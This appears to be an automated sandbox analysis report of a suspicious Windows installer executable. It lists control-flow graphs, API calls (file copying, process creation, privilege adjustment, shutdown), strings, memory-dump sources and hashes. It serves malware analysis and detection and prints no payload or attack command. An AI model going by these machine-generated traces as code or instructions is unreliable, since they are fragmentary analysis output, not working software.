6064->6061 6067 6e9f1654 3 API calls 6065->6067 6068 6e9f1312 2 API calls 6066->6068 6069 6e9f17d2 6067->6069 6070 6e9f17f5 GlobalFree 6068->6070 6071 6e9f1312 2 API calls 6069->6071 6070->6061 6072 6e9f1809 GlobalFree 6070->6072 6073 6e9f17d8 GlobalFree 6071->6073 6072->6061 6073->6061 5068 4024af 5069 402dcb 21 API calls 5068->5069 5070 4024c1 5069->5070 5071 402dcb 21 API calls 5070->5071 5072 4024cb 5071->5072 5085 402e5b 5072->5085 5075 402c4f 5076 402503 5079 402da9 21 API calls 5076->5079 5081 40250f 5076->5081 5077 402dcb 21 API calls 5078 4024f9 lstrlenW 5077->5078 5078->5076 5079->5081 5080 40252e RegSetValueExW 5083 402544 RegCloseKey 5080->5083 5081->5080 5082 403396 48 API calls 5081->5082 5082->5080 5083->5075 5086 402e76 5085->5086 5089 40653d 5086->5089 5090 40654c 5089->5090 5091 4024db 5090->5091 5092 406557 RegCreateKeyExW 5090->5092 5091->5075 5091->5076 5091->5077 5092->5091 5093 402930 5094 402dcb 21 API calls 5093->5094 5095 402937 FindFirstFileW 5094->5095 5096 40295f 5095->5096 5100 40294a 5095->5100 5097 402968 5096->5097 5101 4065e9 wsprintfW 5096->5101 5102 4066a2 lstrcpynW 5097->5102 5101->5097 5102->5100 6074 401931 6075 401968 6074->6075 6076 402dcb 21 API calls 6075->6076 6077 40196d 6076->6077 6078 405dae 71 API calls 6077->6078 6079 401976 6078->6079 6080 403d32 6081 403d3d 6080->6081 6082 403d41 6081->6082 6083 403d44 GlobalAlloc 6081->6083 6083->6082 6091 401934 6092 402dcb 21 API calls 6091->6092 6093 40193b 6092->6093 6094 405d02 MessageBoxIndirectW 6093->6094 6095 401944 6094->6095 5169 4028b6 5170 4028bd 5169->5170 5171 402bce 5169->5171 5172 402da9 21 API calls 5170->5172 5173 4028c4 5172->5173 5174 4028d3 SetFilePointer 5173->5174 5174->5171 5175 4028e3 5174->5175 5177 4065e9 wsprintfW 5175->5177 5177->5171 6096 6e9f23e9 6097 6e9f2453 6096->6097 6098 6e9f245e GlobalAlloc 6097->6098 6099 6e9f247d 6097->6099 6098->6097 6100 401f37 6101 402dcb 21 API calls 6100->6101 6102 401f3d 6101->6102 6103 402dcb 21 API calls 6102->6103 6104 401f46 6103->6104 6105 402dcb 21 API calls 6104->6105 6106 401f4f 6105->6106 6107 402dcb 21 API calls 6106->6107 6108 401f58 6107->6108 6109 401423 28 API calls 6108->6109 6110 401f5f 6109->6110 6117 405cc8 ShellExecuteExW 6110->6117 6112 401fa7 6113 402953 6112->6113 6114 406b41 5 API calls 6112->6114 6115 401fc4 CloseHandle 6114->6115 6115->6113 6117->6112 6118 4014b8 6119 4014be 6118->6119 6120 401389 2 API calls 6119->6120 6121 4014c6 6120->6121 6122 402fb8 6123 402fe3 6122->6123 6124 402fca SetTimer 6122->6124 6125 403031 6123->6125 6126 403037 MulDiv 6123->6126 6124->6123 6127 402ff1 wsprintfW SetWindowTextW SetDlgItemTextW 6126->6127 6127->6125 6129 401d3c 6130 402da9 21 API calls 6129->6130 6131 401d42 IsWindow 6130->6131 6132 401a45 6131->6132 6133 6e9f10e1 6134 6e9f1111 6133->6134 6135 6e9f12b0 GlobalFree 6134->6135 6136 6e9f11d7 GlobalAlloc 6134->6136 6137 6e9f1240 GlobalFree 6134->6137 6138 6e9f135a 2 API calls 6134->6138 6139 6e9f12ab 6134->6139 6140 6e9f1312 2 API calls 6134->6140 6141 6e9f129a GlobalFree 6134->6141 6142 6e9f116b GlobalAlloc 6134->6142 6143 6e9f1381 lstrcpyW 6134->6143 6136->6134 6137->6134 6138->6134 6139->6135 6140->6134 6141->6134 6142->6134 6143->6134

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 403665-4036b7 SetErrorMode GetVersionExW 1 4036f1-4036f6 0->1 2 4036b9-4036e9 GetVersionExW 0->2 3 4036f8 1->3 4 4036fe-403740 1->4 2->1 3->4 5 403742-40374a call 406a96 4->5 6 403753 4->6 5->6 12 40374c 5->12 7 403758-40376c call 406a26 lstrlenA 6->7 13 40376e-40378a call 406a96 * 3 7->13 12->6 20 40379b-4037ff #17 OleInitialize SHGetFileInfoW call 4066a2 GetCommandLineW call 4066a2 13->20 21 40378c-403792 13->21 28 403801-403803 20->28 29 403808-40381c call 405f9e CharNextW 20->29 21->20 26 403794 21->26 26->20 28->29 32 403917-40391d 29->32 33 403821-403827 32->33 34 403923 32->34 36 403830-403837 33->36 37 403829-40382e 33->37 35 403937-403951 GetTempPathW call 403634 34->35 44 403953-403971 GetWindowsDirectoryW lstrcatW call 403634 35->44 45 4039a9-4039c3 DeleteFileW call 4030f5 35->45 39 403839-40383e 36->39 40 40383f-403843 36->40 37->36 37->37 39->40 42 403904-403913 call 405f9e 40->42 43 403849-40384f 40->43 42->32 61 403915-403916 42->61 47 403851-403858 43->47 48 403869-4038a2 43->48 44->45 64 403973-4039a3 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403634 44->64 66 403bb0-403bc0 call 403c82 OleUninitialize 45->66 67 4039c9-4039cf 45->67 49 40385a-40385d 47->49 50 40385f 47->50 51 4038a4-4038a9 48->51 52 4038bf-4038f9 48->52 49->48 49->50 50->48 51->52 56 4038ab-4038b3 51->56 58 403901-403903 52->58 59 4038fb-4038ff 52->59 62 4038b5-4038b8 56->62 63 4038ba 56->63 58->42 59->58 65 403925-403932 call 4066a2 59->65 61->32 62->52 62->63 63->52 64->45 64->66 65->35 79 403bc2-403bd2 call 405d02 ExitProcess 66->79 80 403be6-403bec 66->80 71 4039d5-4039e0 call 405f9e 67->71 72 403a68-403a6f call 403d74 67->72 81 4039e2-403a17 71->81 82 403a2e-403a38 71->82 78 403a74-403a78 72->78 78->66 83 403c6a-403c72 80->83 84 403bee-403c04 GetCurrentProcess OpenProcessToken 80->84 87 403a19-403a1d 81->87 90 403a3a-403a48 call 406079 82->90 91 403a7d-403aa3 call 405c6d lstrlenW call 4066a2 82->91 92 403c74 83->92 93 403c78-403c7c ExitProcess 83->93 88 403c06-403c34 LookupPrivilegeValueW AdjustTokenPrivileges 84->88 89 403c3a-403c48 call 406a96 84->89 94 403a26-403a2a 87->94 95 403a1f-403a24 87->95 88->89 104 403c56-403c61 ExitWindowsEx 89->104 105 403c4a-403c54 89->105 90->66 106 403a4e-403a64 call 4066a2 * 2 90->106 110 403ab4-403acc 91->110 111 403aa5-403aaf call 4066a2 91->111 92->93 94->87 99 403a2c 94->99 95->94 95->99 99->82 104->83 108 403c63-403c65 call 40140b 104->108 105->104 105->108 106->72 108->83 116 403ad1-403ad5 110->116 111->110 118 403ada-403b04 wsprintfW call 4066df 116->118 122 403b06-403b0b call 405bf6 118->122 123 403b0d call 405c50 118->123 127 403b12-403b14 122->127 123->127 128 403b50-403b6f SetCurrentDirectoryW call 406462 CopyFileW 127->128 129 403b16-403b20 GetFileAttributesW 127->129 137 403b71-403b92 call 406462 call 4066df call 405c85 128->137 138 403bae 128->138 130 403b41-403b4c 129->130 131 403b22-403b2b DeleteFileW 129->131 130->116 134 403b4e 130->134 131->130 133 403b2d-403b3f call 405dae 131->133 133->118 133->130 134->66 146 403b94-403b9e 137->146 147 403bd8-403be4 CloseHandle 137->147 138->66 146->138 148 403ba0-403ba8 call 4069ff 146->148 147->138 148->118 148->138
                                                      APIs
                                                      • SetErrorMode.KERNELBASE ref: 00403688
                                                      • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 004036B3
                                                      • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 004036C6
                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040375F
                                                      • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040379C
                                                      • OleInitialize.OLE32(00000000), ref: 004037A3
                                                      • SHGetFileInfoW.SHELL32(00420F08,00000000,?,000002B4,00000000), ref: 004037C2
                                                      • GetCommandLineW.KERNEL32(00428A60,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037D7
                                                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\0GuwV0t2UU.exe",00000020,"C:\Users\user\Desktop\0GuwV0t2UU.exe",00000000,?,00000008,0000000A,0000000C), ref: 00403810
                                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403948
                                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403959
                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403965
                                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403979
                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403981
                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403992
                                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040399A
                                                      • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004039AE
                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\0GuwV0t2UU.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A87
                                                        • Part of subcall function 004066A2: lstrcpynW.KERNEL32(?,?,00000400,004037D7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 004066AF
                                                      • wsprintfW.USER32 ref: 00403AE4
                                                      • GetFileAttributesW.KERNEL32(0042C800,C:\Users\user\AppData\Local\Temp\), ref: 00403B17
                                                      • DeleteFileW.KERNEL32(0042C800), ref: 00403B23
                                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403B51
                                                        • Part of subcall function 00406462: MoveFileExW.KERNEL32(?,?,00000005,00405F60,?,00000000,000000F1,?,?,?,?,?), ref: 0040646C
                                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\0GuwV0t2UU.exe,0042C800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403B67
                                                        • Part of subcall function 00405C85: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405CAE
                                                        • Part of subcall function 00405C85: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405CBB
                                                        • Part of subcall function 004069FF: FindFirstFileW.KERNELBASE(?,00425F98,C:\Users\user\AppData\Local\Temp\nsaC158.tmp,004060C2,C:\Users\user\AppData\Local\Temp\nsaC158.tmp,C:\Users\user\AppData\Local\Temp\nsaC158.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsaC158.tmp,C:\Users\user\AppData\Local\Temp\nsaC158.tmp, 4Wu.Wu,?,75572EE0,00405DCE,?,75573420,75572EE0), ref: 00406A0A
                                                        • Part of subcall function 004069FF: FindClose.KERNEL32(00000000), ref: 00406A16
                                                      • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BB5
                                                      • ExitProcess.KERNEL32 ref: 00403BD2
                                                      • CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,0042C800,00000000), ref: 00403BD9
                                                      • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BF5
                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403BFC
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403C11
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403C34
                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 00403C59
                                                      • ExitProcess.KERNEL32 ref: 00403C7C
                                                        • Part of subcall function 00405C50: CreateDirectoryW.KERNELBASE(?,00000000,00403658,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040394F,?,00000008,0000000A,0000000C), ref: 00405C56
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                      • String ID: "C:\Users\user\Desktop\0GuwV0t2UU.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\0GuwV0t2UU.exe$C:\Users\user\fllesskabsejede\Modfaldent$C:\Users\user\fllesskabsejede\Modfaldent$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                      • API String ID: 1813718867-1482330163
                                                      • Opcode ID: 58d2ad6b71f08f896e928fc089387d11d42e4e28cec5ba88fd5f2c704c1edd34
                                                      • Instruction ID: 48c25345ab5c6186891d52a8fabce3a967a0262862fdddf466c19d710b4311b7
                                                      • Opcode Fuzzy Hash: 58d2ad6b71f08f896e928fc089387d11d42e4e28cec5ba88fd5f2c704c1edd34
                                                      • Instruction Fuzzy Hash: EDF1E571604301AAD720AF659D05B2B7EE8EB8570AF10483EF581B22D1DB7CDA45CB6E
                                                      APIs
                                                        • Part of subcall function 6E9F12BB: GlobalAlloc.KERNEL32(00000040,?,6E9F12DB,?,6E9F137F,00000019,6E9F11CA,-000000A0), ref: 6E9F12C5
                                                      • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 6E9F1D2D
                                                      • lstrcpyW.KERNEL32(00000008,?), ref: 6E9F1D75
                                                      • lstrcpyW.KERNEL32(00000808,?), ref: 6E9F1D7F
                                                      • GlobalFree.KERNEL32(00000000), ref: 6E9F1D92
                                                      • GlobalFree.KERNEL32(?), ref: 6E9F1E74
                                                      • GlobalFree.KERNEL32(?), ref: 6E9F1E79
                                                      • GlobalFree.KERNEL32(?), ref: 6E9F1E7E
                                                      • GlobalFree.KERNEL32(00000000), ref: 6E9F2068
                                                      • lstrcpyW.KERNEL32(?,?), ref: 6E9F2222
                                                      • GetModuleHandleW.KERNEL32(00000008), ref: 6E9F22A1
                                                      • LoadLibraryW.KERNEL32(00000008), ref: 6E9F22B2
                                                      • GetProcAddress.KERNEL32(?,?), ref: 6E9F230C
                                                      • lstrlenW.KERNEL32(00000808), ref: 6E9F2326
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2450949235.000000006E9F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E9F0000, based on PE: true
                                                      • Associated: 00000000.00000002.2450757132.000000006E9F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000000.00000002.2451038784.000000006E9F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000000.00000002.2451083781.000000006E9F6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6e9f0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                      • String ID:
                                                      • API String ID: 245916457-0
                                                      • Opcode ID: 2f336e5af821e6a1204856041ed6165706377004df885d2e3f8565bc2d502187
                                                      • Instruction ID: 8f449caed47fb7dea52be361d281be08e08ed8d66b89a945a3e604acef7438ac
                                                      • Opcode Fuzzy Hash: 2f336e5af821e6a1204856041ed6165706377004df885d2e3f8565bc2d502187
                                                      • Instruction Fuzzy Hash: 83229BB1D14646DEDB508FEAC4903EDB7B8FF06315F10492AD1A5E3281D770DA8A8F90

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 748 405dae-405dd4 call 406079 751 405dd6-405de8 DeleteFileW 748->751 752 405ded-405df4 748->752 753 405f6a-405f6e 751->753 754 405df6-405df8 752->754 755 405e07-405e17 call 4066a2 752->755 756 405f18-405f1d 754->756 757 405dfe-405e01 754->757 761 405e26-405e27 call 405fbd 755->761 762 405e19-405e24 lstrcatW 755->762 756->753 760 405f1f-405f22 756->760 757->755 757->756 763 405f24-405f2a 760->763 764 405f2c-405f34 call 4069ff 760->764 765 405e2c-405e30 761->765 762->765 763->753 764->753 772 405f36-405f4a call 405f71 call 405d66 764->772 768 405e32-405e3a 765->768 769 405e3c-405e42 lstrcatW 765->769 768->769 771 405e47-405e63 lstrlenW FindFirstFileW 768->771 769->771 773 405e69-405e71 771->773 774 405f0d-405f11 771->774 788 405f62-405f65 call 405727 772->788 789 405f4c-405f4f 772->789 777 405e91-405ea5 call 4066a2 773->777 778 405e73-405e7b 773->778 774->756 776 405f13 774->776 776->756 790 405ea7-405eaf 777->790 791 405ebc-405ec7 call 405d66 777->791 781 405ef0-405f00 FindNextFileW 778->781 782 405e7d-405e85 778->782 781->773 786 405f06-405f07 FindClose 781->786 782->777 787 405e87-405e8f 782->787 786->774 787->777 787->781 788->753 789->763 792 405f51-405f60 call 405727 call 406462 789->792 790->781 793 405eb1-405eba call 405dae 790->793 801 405ee8-405eeb call 405727 791->801 802 405ec9-405ecc 791->802 792->753 793->781 801->781 805 405ee0-405ee6 802->805 806 405ece-405ede call 405727 call 406462 802->806 805->781 806->781
                                                      APIs
                                                      • DeleteFileW.KERNELBASE(?,?,75573420,75572EE0,"C:\Users\user\Desktop\0GuwV0t2UU.exe"), ref: 00405DD7
                                                      • lstrcatW.KERNEL32(00424F50,\*.*,00424F50,?,?,75573420,75572EE0,"C:\Users\user\Desktop\0GuwV0t2UU.exe"), ref: 00405E1F
                                                      • lstrcatW.KERNEL32(?,0040A014,?,00424F50,?,?,75573420,75572EE0,"C:\Users\user\Desktop\0GuwV0t2UU.exe"), ref: 00405E42
                                                      • lstrlenW.KERNEL32(?,?,0040A014,?,00424F50,?,?,75573420,75572EE0,"C:\Users\user\Desktop\0GuwV0t2UU.exe"), ref: 00405E48
                                                      • FindFirstFileW.KERNEL32(00424F50,?,?,?,0040A014,?,00424F50,?,?,75573420,75572EE0,"C:\Users\user\Desktop\0GuwV0t2UU.exe"), ref: 00405E58
                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EF8
                                                      • FindClose.KERNEL32(00000000), ref: 00405F07
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                      • String ID: "C:\Users\user\Desktop\0GuwV0t2UU.exe"$POB$\*.*
                                                      • API String ID: 2035342205-3604632646
                                                      • Opcode ID: 3d2f7fed8d6250162ff3c39f7b63e528597fb1dc0209ffdda96aed75cda8f6cd
                                                      • Instruction ID: 08bfc2840413863968cf962241dff1eb28b75ffaef7a08e493f25e9a85e6eaf1
                                                      • Opcode Fuzzy Hash: 3d2f7fed8d6250162ff3c39f7b63e528597fb1dc0209ffdda96aed75cda8f6cd
                                                      • Instruction Fuzzy Hash: E341F130800A06A6CB21AB61CD89BBF7278EF45754F14413FF485B11C1DB7C4A82DEAE

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1078 406dc0-406dc5 1079 406e36-406e54 1078->1079 1080 406dc7-406df6 1078->1080 1081 40742c-407441 1079->1081 1082 406df8-406dfb 1080->1082 1083 406dfd-406e01 1080->1083 1084 407443-407459 1081->1084 1085 40745b-407471 1081->1085 1086 406e0d-406e10 1082->1086 1087 406e03-406e07 1083->1087 1088 406e09 1083->1088 1089 407474-40747b 1084->1089 1085->1089 1090 406e12-406e1b 1086->1090 1091 406e2e-406e31 1086->1091 1087->1086 1088->1086 1093 4074a2-4074ae 1089->1093 1094 40747d-407481 1089->1094 1095 406e20-406e2c 1090->1095 1096 406e1d 1090->1096 1092 407003-407021 1091->1092 1100 407023-407037 1092->1100 1101 407039-40704b 1092->1101 1104 406c44-406c4d 1093->1104 1097 407630-40763a 1094->1097 1098 407487-40749f 1094->1098 1102 406e96-406ec4 1095->1102 1096->1095 1103 407646-407659 1097->1103 1098->1093 1107 40704e-407058 1100->1107 1101->1107 1105 406ee0-406efa 1102->1105 1106 406ec6-406ede 1102->1106 1108 40765e-407662 1103->1108 1109 406c53 1104->1109 1110 40765b 1104->1110 1111 406efd-406f07 1105->1111 1106->1111 1112 40705a 1107->1112 1113 406ffb-407001 1107->1113 1114 406c5a-406c5e 1109->1114 1115 406d9a-406dbb 1109->1115 1116 406cff-406d03 1109->1116 1117 406d6f-406d73 1109->1117 1110->1108 1119 406f0d 1111->1119 1120 406e7e-406e84 1111->1120 1121 406fd6-406fda 1112->1121 1122 40716b-407178 1112->1122 1113->1092 1118 406f9f-406fa9 1113->1118 1114->1103 1131 406c64-406c71 1114->1131 1115->1081 1123 406d09-406d22 1116->1123 1124 4075af-4075b9 1116->1124 1132 406d79-406d8d 1117->1132 1133 4075be-4075c8 1117->1133 1125 4075ee-4075f8 1118->1125 1126 406faf-406fd1 1118->1126 1138 406e63-406e7b 1119->1138 1139 4075ca-4075d4 1119->1139 1127 406f37-406f3d 1120->1127 1128 406e8a-406e90 1120->1128 1129 406fe0-406ff8 1121->1129 1130 4075e2-4075ec 1121->1130 1122->1104 1135 4071c7-4071d6 1122->1135 1136 406d25-406d29 1123->1136 1124->1103 1125->1103 1126->1122 1140 406f9b 1127->1140 1142 406f3f-406f5d 1127->1142 1128->1102 1128->1140 1129->1113 1130->1103 1131->1110 1141 406c77-406cbd 1131->1141 1137 406d90-406d98 1132->1137 1133->1103 1135->1081 1136->1116 1143 406d2b-406d31 1136->1143 1137->1115 1137->1117 1138->1120 1139->1103 1140->1118 1144 406ce5-406ce7 1141->1144 1145 406cbf-406cc3 1141->1145 1146 406f75-406f87 1142->1146 1147 406f5f-406f73 1142->1147 1149 406d33-406d3a 1143->1149 1150 406d5b-406d6d 1143->1150 1153 406cf5-406cfd 1144->1153 1154 406ce9-406cf3 1144->1154 1151 406cc5-406cc8 GlobalFree 1145->1151 1152 406cce-406cdc GlobalAlloc 1145->1152 1148 406f8a-406f94 1146->1148 1147->1148 1148->1127 1155 406f96 1148->1155 1156 406d45-406d55 GlobalAlloc 1149->1156 1157 406d3c-406d3f GlobalFree 1149->1157 1150->1137 1151->1152 1152->1110 1158 406ce2 1152->1158 1153->1136 1154->1153 1154->1154 1160 4075d6-4075e0 1155->1160 1161 406f1c-406f34 1155->1161 1156->1110 1156->1150 1157->1156 1158->1144 1160->1103 1161->1127
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f9c4c7fe21643fbeaf7e138ee869f294de0f5e1fd31501e9972d14a61e44697c
                                                      • Instruction ID: 2c84522690a72e7b125efbdd79dcce5a6d58b8fc95eff680b6a5e34cc787ad25
                                                      • Opcode Fuzzy Hash: f9c4c7fe21643fbeaf7e138ee869f294de0f5e1fd31501e9972d14a61e44697c
                                                      • Instruction Fuzzy Hash: 5EF17670D04229CBDF28CFA8C8946ADBBB1FF44305F24856ED456BB281D7786A86CF45
                                                      APIs
                                                      • FindFirstFileW.KERNELBASE(?,00425F98,C:\Users\user\AppData\Local\Temp\nsaC158.tmp,004060C2,C:\Users\user\AppData\Local\Temp\nsaC158.tmp,C:\Users\user\AppData\Local\Temp\nsaC158.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsaC158.tmp,C:\Users\user\AppData\Local\Temp\nsaC158.tmp, 4Wu.Wu,?,75572EE0,00405DCE,?,75573420,75572EE0), ref: 00406A0A
                                                      • FindClose.KERNEL32(00000000), ref: 00406A16
                                                      Strings
                                                      • C:\Users\user\AppData\Local\Temp\nsaC158.tmp, xrefs: 004069FF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
